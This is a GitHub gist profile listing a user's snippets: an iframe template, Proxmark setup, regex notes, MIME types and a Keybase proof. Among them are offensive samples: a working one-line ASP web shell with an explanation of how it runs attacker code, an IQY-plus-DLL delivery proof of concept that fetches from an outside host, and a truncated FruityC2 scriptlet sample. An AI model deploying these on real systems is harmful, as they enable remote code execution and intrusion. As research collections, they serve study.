Skip to content

Instantly share code, notes, and snippets.

View samsayen's full-sized avatar
🌿

Sam samsayen

🌿
  • New England
View GitHub Profile
@samsayen
samsayen / iframe.html
Created October 13, 2018 23:24
Full Iframe
<html>
<head></head>
<body style="margin:0px;padding:0px;overflow:hidden">
<iframe src="http://www.youraddress.com" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</body>
</html>
@samsayen
samsayen / asp_shellz.asp
Created October 13, 2018 23:26
ASP Shellz
<%execute request(chr(42))%>
Table 2: “Showimg.asp” Web Shell Script
ASP uses Microsoft Visual Basic (VBScript) as its implementation language. The code above uses the chr() function to convert an integer into a character, which is then passed as an argument to the ASP Request() object.
The Request() object will search the Query String for any keys matching the input. In our case, the code is equivalent to Request.QueryString(‘*’). The request object will look for chr(42) which is an asterisk (*), returning whatever is passed to it in a HTTP GET or POST.
Next, the Execute() function will execute any value returned by the lookup. Effectively, an attacker can form a request that will execute any VBScript code. As you might imagine, this is a powerful capability. For example, this code can perform any of the following actions:
As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello W
@samsayen
samsayen / proxmark.txt
Created October 13, 2018 23:27
Proxmark Setup
Install
1. Install homebrew if you haven't yet already done so: http://brew.sh/
2. Tap this repo: `brew tap proxmark/proxmark3`
3. Install Proxmark3:
brew install proxmark3 -- for stable release
brew install --HEAD proxmark3 -- for latest non-stable from GitHub (use this if previous command fails)
Usage
Proxmark3 will be installed in `/usr/local/bin/proxmark3`
@samsayen
samsayen / Regex.txt
Created October 13, 2018 23:31
Regex Misc
Misc Regex
---------------------
Replace all lines ending in $
.*\$$
Replace all lines ending in |
.*\|$
Replace all lines NOT containing :
^[^:]*$
Misc cut
@samsayen
samsayen / content_types.txt
Created October 17, 2018 00:10
Content Types
application/vnd.hzn-3d-crossword
video/3gpp
video/3gpp2
application/vnd.mseq
application/vnd.3m.post-it-notes
application/vnd.3gpp.pic-bw-large
application/vnd.3gpp.pic-bw-small
application/vnd.3gpp.pic-bw-var
application/vnd.3gpp2.tcap
application/x-7z-compressed
@samsayen
samsayen / CF.md
Last active October 23, 2018 01:11
Cloud Foundry (CF)
@samsayen
samsayen / egress_assess.md
Last active October 23, 2018 01:11
EgressAssess
@samsayen
samsayen / keybase.md
Created November 2, 2018 12:37
keybase.md

Keybase proof

I hereby claim:

  • I am samsayen on github.
  • I am keyzer (https://keybase.io/keyzer) on keybase.
  • I have a public key ASAGQ-3OsMonwAuq3IpBnZZDOYug4SdcH9R6PybHXfq5Rwo

To claim this, I am signing this object:

@samsayen
samsayen / poc.iqy
Created November 15, 2018 16:17 — forked from Mr-Un1k0d3r/poc.iqy
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
@samsayen
samsayen / 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct FruityC2 Scriptlet 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
## uploaded by @JohnLaTwC
## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">